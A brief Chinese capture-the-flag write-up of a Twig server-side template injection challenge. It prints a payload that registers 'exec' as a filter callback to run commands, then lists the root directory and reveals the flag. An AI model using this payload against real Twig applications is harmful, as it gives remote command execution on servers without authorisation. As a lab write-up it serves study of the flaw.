模板注入
打开题目
直奔主题吧
发现回显和输入是一样的,猜想是模板注入
这里引入个模板注入流程图
经过测试可以发现该模板应该是Twig,直接去拿对应的Payload
Payload
{{_self.env.registerUndefinedFilterCallback("exec")}{{_self.env.getFilter("id")}}
获取flag
用burp做
查看根目录发现只给一个条信息
换一条命令
echo `ls /`
查看flag结束
flag{0d43413d-c00e-46ba-a74f-cda52f28256f}
Payload参考:
https://zhuanlan.zhihu.com/p/28823933